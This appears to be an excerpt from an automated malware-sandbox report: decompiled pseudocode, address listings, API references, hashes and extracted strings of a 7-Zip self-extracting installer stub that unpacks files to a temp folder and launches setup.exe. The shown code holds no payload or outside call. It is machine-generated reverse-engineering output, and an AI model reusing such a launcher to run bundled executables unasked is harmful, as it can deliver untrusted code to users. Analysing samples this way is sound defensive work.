													E00403A9C(_v128);
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													goto L73;
												} else {
													__eflags = _a7;
													if(_a7 == 0) {
														__eflags = 0;
														E00411127(0);
													}
													E00403A9C(_v228);
													L63:
													L64:
													SetCurrentDirectoryA(_v128);
													_push(_v128);
													L65:
													E00403A9C();
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													E00401A2D( &_v144);
													E00403A9C(_v140);
													E00403A9C(_v56);
													E00403A9C(_v212);
													E00403A9C(_v92);
													E00403A9C(_v104);
													E00403A9C(_v116);
													E00403A9C(_v80);
													E00403A9C(_v32);
													E00403A9C(_v156);
													_t375 = 1;
													return _t375;
												}
											}
											E00401D1B( &_v56, L"setup.exe");
											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
											asm("sbb al, al");
											_v5 =  ~_t384 + 1;
											E00403A9C(_v188);
											__eflags = _v5;
											if(_v5 == 0) {
												goto L57;
											}
											__eflags = _a7;
											if(_a7 == 0) {
												E00411093(0, L"Can not find setup.exe");
											}
											goto L64;
										}
										E00401A18();
										__eflags = _v28;
										_v312.lpDesktop.cbSize = 0x3c;
										_v312.lpTitle = 0x140;
										_v312.dwX = 0;
										_v312.dwY = 0;
										_v312.dwXSize = _v68;
										if(_v28 != 0) {
											E00401DE3( &_v116,  &_v32);
										}
										E00401A18();
										_v312.dwXCountChars = 0;
										asm("sbb eax, eax");
										_v312.dwYCountChars = 1;
										_v312.hStdError = 0;
										_v312.dwYSize =  ~_v40 & _v44;
										ShellExecuteExA( &(_v312.lpDesktop));
										__eflags = _v312.dwFillAttribute - 0x20;
										if(_v312.dwFillAttribute > 0x20) {
											_a4 = _v312.hStdError;
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L69;
										} else {
											__eflags = _a7;
											if(_a7 == 0) {
												__eflags = 0;
												E00411093(0, L"Can not open file");
											}
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L63;
										}
									}
									SetCurrentDirectoryA(_v128);
									E00403A9C(_v128);
									E00403A9C(_v200);
									goto L43;
								}
								__eflags = _a7;
								if(_a7 != 0) {
									L40:
									_push(_v44);
									goto L65;
								}
								__eflags = _t314 - 1;
								if(_t314 == 1) {
									L36:
									_t619 = 8;
									E00401D7A( &_v44, E0040602F(_t619));
									E00403A9C(_v188);
									_t314 = 0x80004005;
									L37:
									__eflags = _t314 - 0x80004004;
									if(_t314 != 0x80004004) {
										__eflags = _v40;
										if(_v40 != 0) {
											_t620 = 7;
											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
											E00403A9C(_v188);
										}
									}
									goto L40;
								}
								__eflags = _v5;
								if(_v5 == 0) {
									goto L37;
								}
								goto L36;
							} else {
								E00411093(0, L"Can not load codecs");
								L43:
								__eflags = _t636;
								if(_t636 != 0) {
									 *((intOrPtr*)( *_t636 + 8))(_t636);
								}
								L24:
								_push(1);
								_pop(0);
								L73:
								E00401A2D( &_v144);
								E00403A9C(_v140);
								E00403A9C(_v56);
								E00403A9C(_v212);
								_t644 =  &(_t644[3]);
								goto L74;
							}
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = 0;
							E00411093(0, L"Can not create temp folder archive");
						}
						goto L24;
					}
					E00402155( &_v176);
					_v176 = 0x41b334;
					_t423 = E00403D5A( &_v92,  &_v176);
					__eflags = _t423;
					if(_t423 != 0) {
						E00401C80( &_v20, L"Title");
						E00404073( &_v68,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"BeginPrompt";
						E00401C80( &_v20);
						E00404073( &_v44,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"Progress";
						E00401C80( &_v20);
						E00404073( &_v228,  &_v176,  &_v20);
						E00403A9C(_v20);
						_t436 = E00403B4F(L"no");
						__eflags = _t436;
						if(_t436 == 0) {
							_v216 = 0;
						}
						E00401C80( &_v20, L"Directory");
						_t642 = E00404041( &_v176,  &_v20);
						E00403A9C(_v20);
						__eflags = _t642;
						if(_t642 >= 0) {
							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
						}
						__eflags = _v40;
						if(_v40 == 0) {
							L20:
							E00401C80( &_v20, L"RunProgram");
							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteFile");
							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteParameters");
							_push( &_v32);
							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
							E00403A9C(_v244.hThread);
							E00403A9C(_v188);
							E00403A9C(_v20);
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[6]);
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							goto L21;
						} else {
							__eflags = _a7;
							if(_a7 != 0) {
								goto L20;
							}
							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
							__eflags = _t466 - 6;
							if(_t466 == 6) {
								goto L20;
							}
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[3]);
							L19:
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							E00403A9C(_v56);
							E00403A9C(_v212);
							E00403A9C(_v92);
							E00403A9C(_v104);
							E00403A9C(_v116);
							E00403A9C(_v80);
							E00403A9C(_v32);
							E00403A9C(_v156);
							goto L75;
						}
					}
					__eflags = _a7;
					if(_a7 == 0) {
						__eflags = 0;
						E00411093(0, L"Config failed");
					}
					_push(1);
					_pop(0);
					goto L19;
				} else {
					if(_a7 == 0) {
						E00411093(0, L"Can\'t load config info");
					}
					_push(1);
					_pop(0);
					L74:
					E00403A9C(_v92);
					E00403A9C(_v104);
					E00403A9C(_v116);
					E00403A9C(_v80);
					E00403A9C(_v32);
					E00403A9C(_v156);
					L75:
					return 0;
				}
			}


































































                                          0x00401023
                                          0x00401028
                                          0x00401031
                                          0x00401039
                                          0x0040103e
                                          0x00401044
                                          0x0040104a
                                          0x00401050
                                          0x00401059
                                          0x0040105c
                                          0x0040105f
                                          0x00401062
                                          0x0040106b
                                          0x0040106e
                                          0x00401071
                                          0x00401074
                                          0x0040107d
                                          0x00401080
                                          0x00401083
                                          0x00401086
                                          0x00401095
                                          0x004010a3
                                          0x004010a7
                                          0x004010af
                                          0x004010b5
                                          0x004010bc
                                          0x004010bf
                                          0x004010c2
                                          0x004010c7
                                          0x004010d0
                                          0x004010d8
                                          0x004010e0
                                          0x004010ed
                                          0x004010f0
                                          0x00401100
                                          0x00401109
                                          0x00401113
                                          0x0040111b
                                          0x00401121
                                          0x00401124
                                          0x0040112f
                                          0x0040113c
                                          0x00401144
                                          0x0040114d
                                          0x00401155
                                          0x00401155
                                          0x0040115e
                                          0x00401161
                                          0x00401164
                                          0x00401167
                                          0x00401172
                                          0x00401173
                                          0x0040117d
                                          0x00401184
                                          0x004011aa
                                          0x004011b3
                                          0x004011b6
                                          0x004011b9
                                          0x004011bc
                                          0x004011c1
                                          0x004011c4
                                          0x004011cb
                                          0x004014b1
                                          0x004014b7
                                          0x004014bd
                                          0x004014ce
                                          0x004014d3
                                          0x004014d5
                                          0x004014f0
                                          0x004014f7
                                          0x004014fa
                                          0x004014fc
                                          0x00401513
                                          0x00401513
                                          0x004014fe
                                          0x004014fe
                                          0x00401501
                                          0x00401504
                                          0x00401509
                                          0x0040150f
                                          0x0040150f
                                          0x00401515
                                          0x00401517
                                          0x0040151c
                                          0x0040151c
                                          0x00401521
                                          0x00401526
                                          0x00401528
                                          0x00401547
                                          0x00401551
                                          0x00401554
                                          0x00401557
                                          0x0040155a
                                          0x0040155d
                                          0x00401568
                                          0x0040156c
                                          0x00401573
                                          0x0040157b
                                          0x0040157c
                                          0x00401581
                                          0x00401583
                                          0x004015fc
                                          0x00401605
                                          0x0040160d
                                          0x0040161e
                                          0x00401620
                                          0x00401622
                                          0x00401651
                                          0x00401654
                                          0x0040172c
                                          0x0040172f
                                          0x00401787
                                          0x00401791
                                          0x00401799
                                          0x004017a6
                                          0x004017b6
                                          0x004017be
                                          0x004017c6
                                          0x004017d5
                                          0x004017e8
                                          0x004017f0
                                          0x004017f5
                                          0x004017f9
                                          0x00401800
                                          0x0040180c
                                          0x0040180c
                                          0x0040181a
                                          0x00401821
                                          0x0040182b
                                          0x00401831
                                          0x00401837
                                          0x0040183d
                                          0x00401843
                                          0x0040184a
                                          0x00401850
                                          0x0040185d
                                          0x00401868
                                          0x00401889
                                          0x0040188f
                                          0x00401891
                                          0x00401940
                                          0x00401952
                                          0x00401955
                                          0x0040195a
                                          0x0040195a
                                          0x0040195e
                                          0x00401965
                                          0x0040196e
                                          0x0040196e
                                          0x00401977
                                          0x0040197c
                                          0x00401987
                                          0x0040198d
                                          0x00401990
                                          0x00401995
                                          0x00401995
                                          0x00000000
                                          0x00401897
                                          0x00401897
                                          0x0040189a
                                          0x0040189c
                                          0x0040189e
                                          0x0040189e
                                          0x004018a9
                                          0x004018ae
                                          0x004018af
                                          0x004018b2
                                          0x004018b4
                                          0x004018b7
                                          0x004018b7
                                          0x004018c2
                                          0x004018c8
                                          0x004018cb
                                          0x004018d0
                                          0x004018d0
                                          0x004018d9
                                          0x004018e4
                                          0x004018ec
                                          0x004018f7
                                          0x004018ff
                                          0x00401907
                                          0x0040190f
                                          0x00401917
                                          0x0040191f
                                          0x0040192a
                                          0x00401934
                                          0x00000000
                                          0x00401934
                                          0x00401891
                                          0x00401739
                                          0x0040174e
                                          0x0040175b
                                          0x0040175f
                                          0x00401762
                                          0x00401767
                                          0x0040176b
                                          0x00000000
                                          0x00000000
                                          0x0040176d
                                          0x00401770
                                          0x0040177d
                                          0x0040177d
                                          0x00000000
                                          0x00401770
                                          0x00401660
                                          0x00401668
                                          0x0040166b
                                          0x00401675
                                          0x0040167f
                                          0x00401685
                                          0x0040168b
                                          0x00401691
                                          0x0040169a
                                          0x0040169a
                                          0x004016a5
                                          0x004016ad
                                          0x004016b5
                                          0x004016b7
                                          0x004016c4
                                          0x004016ca
                                          0x004016d7
                                          0x004016dd
                                          0x004016e4
                                          0x00401716
                                          0x00401719
                                          0x00401721
                                          0x00000000
                                          0x004016e6
                                          0x004016e6
                                          0x004016e9
                                          0x004016f0
                                          0x004016f2
                                          0x004016f2
                                          0x004016fa
                                          0x00401702
                                          0x00000000
                                          0x00401707
                                          0x004016e4
                                          0x00401627
                                          0x0040162c
                                          0x00401637
                                          0x00000000
                                          0x0040163d
                                          0x00401585
                                          0x00401588
                                          0x004015f1
                                          0x004015f1
                                          0x00000000
                                          0x004015f1
                                          0x0040158a
                                          0x0040158d
                                          0x00401594
                                          0x0040159c
                                          0x004015a6
                                          0x004015b1
                                          0x004015b7
                                          0x004015bc
                                          0x004015bc
                                          0x004015c1
                                          0x004015c3
                                          0x004015c6
                                          0x004015d0
                                          0x004015df
                                          0x004015eb
                                          0x004015f0
                                          0x004015c6
                                          0x00000000
                                          0x004015c1
                                          0x0040158f
                                          0x00401592
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040152a
                                          0x00401531
                                          0x0040163e
                                          0x0040163e
                                          0x00401640
                                          0x00401649
                                          0x00401649
                                          0x004014e8
                                          0x004014e8
                                          0x004014ea
                                          0x00401998
                                          0x0040199e
                                          0x004019a9
                                          0x004019b1
                                          0x004019bc
                                          0x004019c1
                                          0x00000000
                                          0x004019c1
                                          0x00401528
                                          0x004014d7
                                          0x004014da
                                          0x004014e1
                                          0x004014e3
                                          0x004014e3
                                          0x00000000
                                          0x004014da
                                          0x004011d7
                                          0x004011ea
                                          0x004011f0
                                          0x004011f5
                                          0x004011f7
                                          0x0040121a
                                          0x0040122c
                                          0x00401234
                                          0x0040123c
                                          0x00401243
                                          0x00401255
                                          0x0040125d
                                          0x00401265
                                          0x0040126c
                                          0x00401281
                                          0x00401289
                                          0x0040129a
                                          0x0040129f
                                          0x004012a1
                                          0x004012a3
                                          0x004012a3
                                          0x004012b1
                                          0x004012c7
                                          0x004012c9
                                          0x004012ce
                                          0x004012d1
                                          0x004012e2
                                          0x004012e6
                                          0x004012e6
                                          0x004012eb
                                          0x004012ee
                                          0x0040139d
                                          0x004013a5
                                          0x004013c3
                                          0x004013ce
                                          0x004013d6
                                          0x004013e5
                                          0x00401403
                                          0x0040140e
                                          0x00401416
                                          0x00401425
                                          0x00401433
                                          0x00401454
                                          0x0040145f
                                          0x0040146a
                                          0x00401472
                                          0x0040147d
                                          0x00401485
                                          0x0040148d
                                          0x00401492
                                          0x0040149b
                                          0x004014a1
                                          0x004014ac
                                          0x00000000
                                          0x004012f4
                                          0x004012f4
                                          0x004012f7
                                          0x00000000
                                          0x00000000
                                          0x00401306
                                          0x0040130c
                                          0x0040130f
                                          0x00000000
                                          0x00000000
                                          0x0040131b
                                          0x00401323
                                          0x0040132b
                                          0x00401330
                                          0x00401333
                                          0x00401339
                                          0x0040133f
                                          0x0040134a
                                          0x00401352
                                          0x0040135d
                                          0x00401365
                                          0x0040136d
                                          0x00401375
                                          0x0040137d
                                          0x00401385
                                          0x00401390
                                          0x00000000
                                          0x00401395
                                          0x004012ee
                                          0x004011f9
                                          0x004011fc
                                          0x00401203
                                          0x00401205
                                          0x00401205
                                          0x0040120a
                                          0x0040120c
                                          0x00000000
                                          0x00401186
                                          0x00401189
                                          0x00401192
                                          0x00401192
                                          0x00401197
                                          0x00401199
                                          0x004019c4
                                          0x004019c7
                                          0x004019cf
                                          0x004019d7
                                          0x004019df
                                          0x004019e7
                                          0x004019f2
                                          0x004019fa
                                          0x00000000
                                          0x004019fa

                                          APIs
                                            • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                                          • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                            • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                            • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                            • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                            • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                            • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                            • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                                          • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                                          • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                                          • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                                          • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                                          • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                            • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                            • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                                          • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                                          • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                                          • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                                          • API String ID: 2760820266-829806607
                                          • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                                          • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                                          • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                                          • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AD19 Relevance: 14.2, APIs: 9, Instructions: 682COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 372 40ad19-40ad3d call 413954 call 40d7cc 377 40ad43-40ad79 call 402155 call 413310 call 40640d 372->377 378 40b2d7-40b2dc 372->378 386 40ae60-40ae97 call 40acc4 call 40b99b call 40b63c 377->386 387 40ad7f 377->387 379 40b605-40b613 378->379 402 40aeb6-40aec6 call 4042d6 386->402 403 40ae99-40aeb0 call 40b753 386->403 389 40ad82-40ad8c call 403a76 387->389 394 40ad9c 389->394 395 40ad8e-40ad9a 389->395 398 40ad9e-40ada3 394->398 395->398 400 40ada5-40ada7 398->400 401 40adab-40add6 call 403a76 398->401 400->401 410 40add8-40ade8 401->410 411 40adea 401->411 413 40aed1-40aed5 402->413 414 40aec8-40aece 402->414 403->402 412 40b071-40b087 403->412 415 40adec-40adf1 410->415 411->415 425 40b08d-40b090 412->425 426 40b4bf-40b4e1 call 40a402 412->426 416 40aed7-40aeeb call 403a76 413->416 417 40af18-40af2a 413->417 414->413 418 40adf3-40adf5 415->418 419 40adf9-40ae32 call 40640d call 40a5e4 415->419 434 40aef6 416->434 435 40aeed-40aef4 call 40b860 416->435 432 40af73-40af79 417->432 433 40af2c-40af6e call 4042ad call 4099bc DeleteCriticalSection call 403800 417->433 418->419 447 40ae34-40ae36 419->447 448 40ae3a-40ae40 419->448 431 40b093-40b0c8 425->431 444 40b4e3-40b4e9 426->444 445 40b4ec-40b4ef 426->445 460 40b0f3-40b0f9 431->460 461 40b0ca-40b0d3 431->461 440 40b05f-40b06e call 40b96f 432->440 441 40af7f-40afac call 4063bd 432->441 504 40b535-40b549 call 4042d6 call 4042ad 433->504 439 40aef8-40af0c call 40640d 434->439 435->439 468 40af13 439->468 469 40af0e-40af11 439->469 440->412 470 40afb2-40afbd 441->470 471 40b197-40b1a0 441->471 444->445 453 40b4f1-40b533 call 4042ad call 4099bc DeleteCriticalSection call 403800 445->453 454 40b54e-40b57e call 4032a8 call 404327 445->454 447->448 458 40ae42-40ae44 448->458 459 40ae48-40ae57 448->459 453->504 518 40b580-40b597 call 4039df 454->518 519 40b599-40b5b9 call 409cc8 454->519 458->459 459->389 472 40ae5d 459->472 465 40b101-40b149 call 4032a8 * 2 call 404327 * 2 460->465 466 40b0fb-40b0fd 460->466 473 40b382-40b388 461->473 474 40b0d9-40b0ea 461->474 575 40b163-40b169 465->575 576 40b14b-40b161 call 4039df 465->576 466->465 477 40af15 468->477 469->477 480 40afeb-40afef 470->480 481 40afbf-40afc3 470->481 482 40b1a2-40b1a4 471->482 483 40b1a8-40b1b1 471->483 472->386 484 40b390-40b3d7 call 4042ad call 4099bc DeleteCriticalSection call 403800 473->484 485 40b38a-40b38c 473->485 497 40b0f0 474->497 498 40b3d9-40b3e2 474->498 477->417 486 40b270-40b279 480->486 487 40aff5-40b004 call 40640d 480->487 481->480 492 40afc5-40afca 481->492 482->483 493 40b1b3-40b1b5 483->493 494 40b1b9-40b1fd call 4042ad call 4099bc DeleteCriticalSection call 403800 483->494 560 40b42c-40b442 call 4042d6 call 4042ad 484->560 485->484 502 40b281-40b2d2 call 4042ad call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 486->502 503 40b27b-40b27d 486->503 525 40b011-40b026 call 40bab0 487->525 526 40b006-40b00c call 40a0de 487->526 506 40afd0-40afdc call 40640d 492->506 507 40b202-40b20b 492->507 493->494 494->504 497->460 510 40b3e4-40b3e6 498->510 511 40b3ea-40b425 call 4042ad call 4099bc DeleteCriticalSection call 403800 498->511 502->378 503->502 567 40b603 504->567 506->525 548 40afde-40afe9 call 40a0b9 506->548 513 40b216-40b21c 507->513 514 40b20d-40b213 507->514 510->511 511->560 528 40b224-40b26b call 4042ad call 4099bc DeleteCriticalSection call 403800 513->528 529 40b21e-40b220 513->529 514->513 518->519 547 40b5bc-40b5fe call 4042ad * 2 call 4099bc call 40b845 call 40a5ac 519->547 563 40b028-40b02a 525->563 564 40b02e-40b037 525->564 526->525 528->504 529->528 547->567 548->525 560->379 563->564 573 40b039-40b03b 564->573 574 40b03f-40b048 564->574 567->379 573->574 583 40b050-40b059 574->583 584 40b04a-40b04c 574->584 586 40b33a-40b36e call 4042ad * 2 575->586 587 40b16f 575->587 576->575 583->440 583->441 584->583 586->431 627 40b374-40b379 586->627 593 40b172-40b179 587->593 599 40b2e5 593->599 600 40b17f 593->600 603 40b2e8-40b2ea 599->603 605 40b182-40b184 600->605 607 40b2f8-40b2ff 603->607 608 40b2ec-40b2f6 603->608 610 40b2e1-40b2e3 605->610 611 40b18a-40b190 605->611 614 40b310 607->614 615 40b301 607->615 613 40b31e-40b334 call 4039df 608->613 610->603 611->605 617 40b192 611->617 613->586 613->593 619 40b313-40b315 614->619 618 40b304-40b306 615->618 617->599 622 40b308-40b30e 618->622 623 40b37e-40b380 618->623 624 40b447-40b4ba call 4042ad * 3 call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 619->624 625 40b31b 619->625 622->614 622->618 623->619 624->379 625->613 627->426
                                          C-Code - Quality: 90%
                                          			E0040AD19(char* __ecx, void* __eflags) {
				signed int _t373;
				signed int _t382;
				intOrPtr* _t417;
				signed int _t419;
				signed int _t423;
				signed int _t429;
				signed int _t430;
				intOrPtr* _t440;
				intOrPtr* _t441;
				signed int _t453;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t471;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t490;
				signed int _t504;
				signed int _t505;
				intOrPtr _t507;
				signed int _t508;
				signed char _t510;
				char _t512;
				intOrPtr* _t513;
				signed int _t518;
				signed int _t523;
				signed int _t535;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr* _t540;
				signed int _t580;
				signed int _t581;
				intOrPtr _t589;
				signed int _t595;
				signed int _t626;
				signed int _t652;
				signed int _t653;
				char* _t658;
				signed int _t660;
				signed int _t661;
				intOrPtr* _t662;
				signed int _t664;
				signed int* _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				intOrPtr _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				intOrPtr _t675;
				intOrPtr* _t676;
				signed int _t677;
				void* _t678;

				E00413954(E0041A132, _t678);
				_t664 =  *(_t678 + 0x18);
				_t658 = __ecx;
				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
				if(E0040D7CC(_t664) == 0) {
					L81:
					_t373 = 0x80004001;
					L114:
					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
					return _t373;
				}
				E00402155(_t678 - 0x2c);
				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
				 *(_t678 - 4) = 0;
				 *((intOrPtr*)(_t678 - 0x50)) = 0;
				E00413310(_t678 - 0x4c);
				 *(_t678 - 4) = 1;
				E0040640D(_t678 - 0x50,  *(_t678 + 8));
				 *(_t678 + 8) = 0;
				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
					L19:
					_t535 =  *( *(_t678 + 0x18) + 8);
					 *(_t678 - 0x18) = _t535;
					E0040ACC4(_t678 - 0xf8);
					 *(_t678 - 4) = 4;
					E0040B99B(_t678 - 0xa8);
					 *(_t678 - 4) = 5;
					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
					if( *_t658 == 0) {
						L21:
						E004042D6();
						_t382 =  *(_t658 + 0x74);
						_t667 = _t658 + 0x74;
						if(_t382 != 0) {
							 *((intOrPtr*)( *_t382 + 8))(_t382);
							 *_t667 =  *_t667 & 0x00000000;
						}
						if( *((char*)(_t658 + 0x68)) != 0) {
							_push(0x88);
							_t504 = E00403A76();
							 *(_t678 + 8) = _t504;
							 *(_t678 - 4) = 6;
							if(_t504 == 0) {
								_t505 = 0;
								__eflags = 0;
							} else {
								_t505 = E0040B860(_t504);
							}
							 *(_t678 - 4) = 5;
							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
							E0040640D(_t667, _t505);
							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
							if(_t507 == 0) {
								_t508 = 0;
								__eflags = 0;
							} else {
								_t508 = _t507 + 4;
							}
							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
						}
						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
						_t700 = _t668;
						if(_t668 == 0) {
							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
							__eflags = _t535;
							if(__eflags <= 0) {
								L50:
								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
								 *_t658 = 1;
								L51:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
								_t669 = 0;
								__eflags =  *(_t678 - 0x18);
								 *((intOrPtr*)(_t678 - 0x34)) = 0;
								 *(_t678 + 0x10) = 0;
								 *(_t678 - 0x14) = 0;
								if( *(_t678 - 0x18) <= 0) {
									L105:
									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
									__eflags =  *((char*)(_t658 + 0x68));
									if( *((char*)(_t658 + 0x68)) != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
									}
									__eflags =  *(_t678 - 0x18) - _t669;
									if( *(_t678 - 0x18) != _t669) {
										E004032A8(_t678 - 0x94, 4);
										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
										 *(_t678 - 4) = 0x1d;
										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
										_t670 = 0;
										__eflags =  *(_t678 - 0x24);
										if( *(_t678 - 0x24) <= 0) {
											L112:
											_t660 =  *(_t658 + 0x74);
											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
											 *(_t678 - 4) = 5;
											E004042AD(_t678 - 0x94);
											 *(_t678 - 4) = 0x1e;
											E004042AD(_t678 - 0xa8);
											 *(_t678 - 4) = 1;
											E004099BC(_t678 - 0xf8, __eflags);
											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
											E0040B845(_t678 - 0x50);
											_t366 = _t678 - 4;
											 *_t366 =  *(_t678 - 4) | 0xffffffff;
											__eflags =  *_t366;
											E0040A5AC(_t678 - 0x2c);
											goto L113;
										} else {
											goto L111;
										}
										do {
											L111:
											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
											_t670 = _t670 + 1;
											__eflags = _t670 -  *(_t678 - 0x24);
										} while (_t670 <  *(_t678 - 0x24));
										goto L112;
									} else {
										 *(_t678 - 4) = 0x1b;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x1c;
										_t668 = 0;
										__eflags = 0;
										goto L109;
									}
								}
								_t661 =  *(_t678 + 0x18);
								 *(_t678 + 8) = 0;
								do {
									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
									 *(_t678 - 4) = 0x12;
